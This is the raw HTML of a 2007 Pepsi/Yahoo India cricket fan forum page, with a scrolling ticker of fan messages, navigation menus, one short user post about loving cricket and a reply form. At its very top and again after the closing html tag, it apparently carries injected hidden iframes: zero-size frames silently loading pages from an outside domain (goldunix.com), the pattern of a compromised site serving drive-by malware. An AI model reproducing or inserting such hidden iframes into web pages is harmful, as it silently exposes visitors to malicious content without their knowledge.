
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>:: Peps i::</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="http://pepsizone.yahoo.co.in/bluebillion/pepsi_new.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style6 {
	color: #FFFFFF;
	font-size: 9px;
}
.style9 {font-size: 11px}
.style10 {color: #FFFFFF}
.style15 {font-size: 11px; color: #FFFFFF; }
-->
</style><style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
	font-size: 11px;
	font-weight: bold;
	font-family: Verdana, Arial, Helvetica, sans-serif;
}
-->
</style>
<LINK href="Pepsi2_files/dropmenu.css" type=text/css rel=stylesheet>
<SCRIPT src="Pepsi2_files/dropmenu.js" type=text/javascript></SCRIPT>

<SCRIPT language=JavaScript type=text/JavaScript>
<!--
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</SCRIPT>

<SCRIPT language=JavaScript>

var tWidth='760px';
var tHeight='15px';
var tcolour='#1a4d9e';
var moStop=true;
var fontfamily = 'arial,sans-serif';
var tSpeed=3;

var content="DHONI - You are just excellent. You are THE BEST. So play well & hit more sixers.– Krishna&nbsp;&nbsp;&nbsp;SREESANTH - Sree you are great in batting too. All the best man. Do well. - CRICKET_VAISH_DRAVID&nbsp;&nbsp;&nbsp;Sachin Tendulkar - Play your natural game. We are with you - Anshu Srivastava&nbsp;&nbsp;&nbsp;Team India - You should win the Test series in South Africa - Jafar Sheikh&nbsp;&nbsp;&nbsp;Saurav Ganguly - DADA YOU'LL DEFINITELY PLAY WC2007 – Vikas&nbsp;&nbsp;&nbsp;IRFAN PATHAN - Don't worry. You have been sent back for your own good, you’ll surely improve… - Zainab Hussain";

var cps=tSpeed; var aw, mq; var fsz = parseInt(tHeight) - 4; function startticker(){if (document.getElementById) {var tick = '<div style="position:relative;width:'+tWidth+';height:'+tHeight+';overflow:hidden; color:#ffffff; background-color:'+tcolour+'"';if (moStop) tick += ' onmouseover="cps=0" onmouseout="cps=tSpeed"'; tick +='><div id="mq" style="position:absolute;left:0px;top:0px;font-family:'+fontfamily+';font-size:'+fsz+'px;white-space:nowrap;"><\/div><\/div>'; document.getElementById('ticker').innerHTML = tick; mq = document.getElementById("mq"); mq.style.left=(parseInt(tWidth)+10)+"px"; mq.innerHTML='<span  id="tx">'+content+'<\/span>'; aw = document.getElementById("tx").offsetWidth; lefttime=setInterval("scrollticker()",50);}} function scrollticker(){mq.style.left = (parseInt(mq.style.left)>(-10 - aw)) ?parseInt(mq.style.left)-cps+"px" : parseInt(tWidth)+10+"px";} window.onload=startticker;

</SCRIPT>
<link href="pepsi.css" rel="stylesheet" type="text/css">
</head>

<body onLoad="MM_preloadImages('images/mypitch_dn.jpg','images/funzone_dn.jpg','images/videos_dn.jpg','images/pavillion_dn.jpg','images/fanzone_dn.jpg','images/news_dn.jpg','images/register_dn.jpg')">
<table width="774" border="0" cellspacing="0" cellpadding="0" align="center">
  <tr><td bgcolor="#1c4c98" align="right" colspan="3" class="toplink"><a href="http://in.rd.yahoo.com/bbhome/?http://pepsizone.yahoo.co.in/bluebillion.php">Home</a>&nbsp;&nbsp;&nbsp;</td>
  </tr>
  <tr>
    <td colspan="3"><img src="images/topbar_inside.jpg" width="774" height="89"></td>
  </tr>
  <tr>
    <td width="161" valign="top" bgcolor="#0278C2"><table width="161"  border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td colspan="3"><img src="images/left_nav_top.jpg" width="161" height="84"></td>
      </tr>
      <tr>
       <TD width=36 rowSpan=7><IMG height=158
            src="Pepsi2_files/left_nav_lef.jpg" width=36></TD>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image6','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/mypitch_dn.jpg',1); dropdownmenu(this, event, 'anylinkmenu1')"
            onmouseout=MM_swapImgRestore()
            href="http://in.rd.yahoo.com/bbpoints/?http://in.cgi.yahoo.com/bb2/script/bp_show.php"><IMG
            height=25 src="Pepsi2_files/mypitch_up.jpg" width=103 border=0
            name=Image6></A></TD>
          <DIV class=dropmenucss id=anylinkmenu1><A
          href="http://in.rd.yahoo.com/bbpoints/?http://in.cgi.yahoo.com/bb2/script/bp_show.php"><IMG
          src="Pepsi2_files/blue_points.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbpoints/?http://in.cgi.yahoo.com/bb2/script/myarea.php"><IMG
          src="Pepsi2_files/my_area.gif" border=0></A> </DIV>
          <TD width=22 rowSpan=7><IMG height=158
            src="Pepsi2_files/left_nav_rt.jpg" width=22></TD></TR>
        <TR>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image7','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/funzone_dn.jpg',1); dropdownmenu(this, event, 'anylinkmenu2')"
            onmouseout=MM_swapImgRestore()
            href="http://in.rd.yahoo.com/bbdownload/?http://in.cgi.yahoo.com/bb2/script/down_show.php"><IMG
            height=23 src="Pepsi2_files/funzone_up.jpg" width=103 border=0
            name=Image7></A></TD>
          <DIV class=dropmenucss id=anylinkmenu2><A
          href="http://in.rd.yahoo.com/bbdownload/?http://in.cgi.yahoo.com/bb2/script/down_show.php"><IMG
          src="Pepsi2_files/downloads.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbgame/?http://pepsizone.yahoo.co.in/bluebillion/game.php"><IMG
          src="Pepsi2_files/game.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbcontest/?http://pepsizone.yahoo.co.in/bluebillion/contest.php"><IMG
          src="Pepsi2_files/contest.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbquiz/?http://in.cgi.yahoo.com/bb2/script/quiz_show.php"><IMG
          src="Pepsi2_files/quiz.gif" border=0></A> <A
          href="http://pepsizone.yahoo.co.in/bluebillion/comingsoon.html"><IMG
          src="Pepsi2_files/ecards.gif" border=0></A> </DIV></TR>
        <TR>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image8','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/videos_dn.jpg',1)"
            onmouseout=MM_swapImgRestore()
            href="http://in.rd.yahoo.com/bbvideohome/?http://pepsizone.yahoo.co.in/bluebillion/video/videos_songs.html"><IMG
            height=21 src="Pepsi2_files/videos_up.jpg" width=103 border=0
            name=Image8></A></TD></TR>
        <TR>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image9','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/pavillion_dn.jpg',1); dropdownmenu(this, event, 'anylinkmenu3')"
            onmouseout=MM_swapImgRestore()
            href="http://198.65.102.149/MessageBoard.asp"><IMG height=23
            src="Pepsi2_files/pavillion_up.jpg" width=103 border=0
            name=Image9></A></TD>
          <DIV class=dropmenucss id=anylinkmenu3><A
          href="http://pepsizone.yahoo.co.in/bluebillion/vpromo/main.html"><IMG
          src="Pepsi2_files/message_board.gif" border=0></A> <A
          href="http://198.65.102.149/forum_homepage.asp"><IMG
          src="Pepsi2_files/forums.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbrefer/?http://in.cgi.yahoo.com/bb2/script/refer_show.php"><IMG
          src="Pepsi2_files/refer_a_friend.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbvideochant/?http://pepsizone.yahoo.co.in/bluebillion/video/chant/viral_chant.html"><IMG
          src="Pepsi2_files/aayaaayachant.gif" border=0></A> </DIV></TR>
        <TR>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image13','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/fanzone_dn.jpg',1); dropdownmenu(this, event, 'anylinkmenu4')"
            onmouseout=MM_swapImgRestore()
            href="http://in.rd.yahoo.com/bbexpress/?http://pepsizone.yahoo.co.in/bluebillion/bbexpress/blue_billion_videos.html"><IMG
            height=21 src="Pepsi2_files/fanzone_up.jpg" width=103 border=0
            name=Image13></A></TD>
          <DIV class=dropmenucss id=anylinkmenu4><A
          href="http://pepsizone.yahoo.co.in/bluebillion/bbexpress/express_euphoria.html"><IMG
          src="Pepsi2_files/express_euphoria.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbfan/?http://pepsizone.yahoo.co.in/bluebillion/poll/craziest_fan2.html"><IMG
          src="Pepsi2_files/one_in_a_billion.gif" border=0></A> </DIV></TR>
        <TR>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image11','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/news_dn.jpg',1); dropdownmenu(this, event, 'anylinkmenu5')"
            onmouseout=MM_swapImgRestore()
            href="http://in.rd.yahoo.com/bbnews/?http://pepsizone.yahoo.co.in/bluebillion/news.php"><IMG
            height=22 src="Pepsi2_files/news_up.jpg" width=103 border=0
            name=Image11></A></TD>
          <DIV class=dropmenucss id=anylinkmenu5><A
          href="http://in.rd.yahoo.com/bbnews/?http://pepsizone.yahoo.co.in/bluebillion/news.php"><IMG
          src="Pepsi2_files/news.gif" border=0></A> <A
          href="http://in.rd.yahoo.com/bbcricketsch/?http://pepsizone.yahoo.co.in/bluebillion/matchschedule.html"><IMG
          src="Pepsi2_files/schedule.gif" border=0></A> </DIV></TR>
        <TR>
          <TD width=103 bgColor=#65b6ea><A
            onmouseover="MM_swapImage('Image12','','http://in.yimg.com/i/in/promos/pepsi/pepsi3/bluebillion/register_dn.jpg',1)"
            onmouseout=MM_swapImgRestore()
            href="http://in.rd.yahoo.com/bbregtrnow/?http://in.cgi.yahoo.com/bb2/script/show.php"><IMG
            height=23 src="Pepsi2_files/register_up.jpg" width=103 border=0
            name=Image12></A></TD></TR>
           <tr>
           <tr>
        <td height="114" colspan="3"><div class="blue_card"><div class="user_name"><center>I am</center>Blue Billion</div></div></td>
      </tr>
	  <tr>
	  <tr>
        <td colspan="3" bgcolor="#0278C2" height="100%" align="bottom"></td>
      </tr>

    </table></td>
    <td width="604" align="left" valign="top"><table width="100%"  border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td align="top"><img src="images/top_mid_redeem.jpg" width="604" height="8"></td>
      </tr>
      <tr>
        <td align="top"><img src="images/pavilion_forum.jpg" width="604" height="156"></td>
      </tr>
    </table>
	<table width="100%"  border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="13%" height="80" valign="bottom"><img src="images/fish.jpg" width="56" height="59" hspace="10"></td>
    <td width="87%" valign="bottom"><img src="images/avid_cricket_fan_forum.gif" width="402" height="39" vspace="10"></td>
  </tr>
  <tr>
    <td colspan="2" valign="bottom">&nbsp;</td>
  </tr>
  <tr align="center">
    <td colspan="2"><table width="463" border="0" cellspacing="0" cellpadding="3">
      <tr>
	      
        <td align="left" class="verdana11black" style="border-bottom-color:#000000; border-bottom-width:1px; border-bottom-style:solid; border-left-color:#000000; border-left-width:1px; border-left-style:solid; border-top-color:#000000; border-top-width:1px; border-top-style:solid; border-right-color:#000000; border-right-width:1px; border-right-style:solid"> posted by <B>abhay</b> on <B>Saturday, March 17, 2007</b> </td>
      </tr>
      <tr>
        <td align="left" class="verdana11black" style="border-bottom-color:#000000; border-bottom-width:1px; border-bottom-style:solid; border-left-color:#000000; border-left-width:1px; border-left-style:solid; border-right-color:#000000; border-right-width:1px; border-right-style:solid"><strong><font color="#406DC1"> cricketer</font></strong></td>
      </tr>
      <tr>
        <td align="left" class="verdana11black" style="border-bottom-color:#000000; border-bottom-width:1px; border-bottom-style:solid; border-left-color:#000000; border-left-width:1px; border-left-style:solid;  border-right-color:#000000; border-right-width:1px; border-right-style:solid; padding-bottom:10px">i luv cricket. i wanna be a cricketer. my favourate cricketer is dhoni </td>
      </tr>
	  	

    </table>
				  </td>
    </tr>
</table>

      <table width="100%"  border="0" cellspacing="0" cellpadding="0" height="100">
        <tr>
          <td style="font color="#FF4848"><table width="100%"  border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td><form name="form1" method="post" action="Forum_Inside.asp#post"><INPUT TYPE=Hidden Name=CMD Value=2><INPUT TYPE=Hidden Name=ForumID Value=2134>
                <table width="100%"  border="0" cellspacing="0" cellpadding="0">
                  <tr>
                    <td class="verdana12black" style="padding-left:90px; padding-top:30px; font-weight: bold;"><img src="images/post_reply.gif" width="86" height="14"></td>
                  </tr>
                  <tr>
                    <td class="verdana12black" style="padding-left:90px; padding-top:30px; font-weight: bold;">Name</td>
                    </tr>
                  <tr>
                    <td height="40" class="verdana11grey" style="padding-left:88px;"><input name="YourName" type="text" class="yahootextbox" size="25" Value="">
                    <BR>
                    </td>
                    </tr>
                  <tr>
                    <td height="30" class="verdana12black" style="padding-left:90px; font-weight: bold;">Message</td>
                    </tr>
                  <tr>
                    <td height="40" class="verdana11grey" style="padding-left:88px;"><textarea name="Message" cols="25" rows="6" wrap="VIRTUAL" class="textarea"></textarea>
                      <BR></td>
                  </tr>
                  <tr>
                    <td align="center" class="verdana12black" style="padding-left:90px; font-weight: bold;"><input type="image" name="imageField" src="images/submit_button.jpg"></td>
                    </tr>
                </table>
              </form></td>
              </tr>
          </table></td>
        </tr>
        <tr valign="bottom">
          <td align="right" >&nbsp;</td>
        </tr>
        <tr>
          <td height="40" align="right" style="padding-right:60px;"><font color="#FF1718" class="verdana11grey"><font color="#FF1718">*Conditions Apply</font></font></td>
        </tr>
      </table>    </td>
 <td width="9" align="right" valign="top" bgcolor="#0278C2"><img src="images/mid_right_corner.jpg" height="356" width="9"></td></tr>
</table>
<table width="774" border="0" cellspacing="0" cellpadding="0" align="center" valign="top">
<tr>
<td width="161" align="bottom"><img src="images/left_bottom.jpg" width="161" height="203"></td>
  <td width="604" height="203" valign="bottom" background="images/bg_bottom_trans.gif" style="padding-left:108px; background-position:bottom;background-repeat:no-repeat;"><img src="images/pathan_footer.jpg" width="268" height="203"></td>
  <td width="9" height="203"><img src="images/right_bottom.jpg" width="9" height="203"></td>
  </tr>
  <tr>
    <td colspan=3 height="20" background="images/bottom_redeem.jpg" class="verdana10white" style="padding-left:190px; background-repeat:no-repeat;"><a href="http://pepsizone.yahoo.co.in/bluebillion/mbterms.html" class="verdana10white">Feedback </a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://pepsizone.yahoo.co.in/bluebillion/mbterms.html" class="verdana10white">&nbsp;Terms and Conditions</a></td>
  </tr>
  <tr><td colspan=3 ><img src="images/bottom_redeem2.jpg"></td></tr>
</table>
</body>
</html>

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>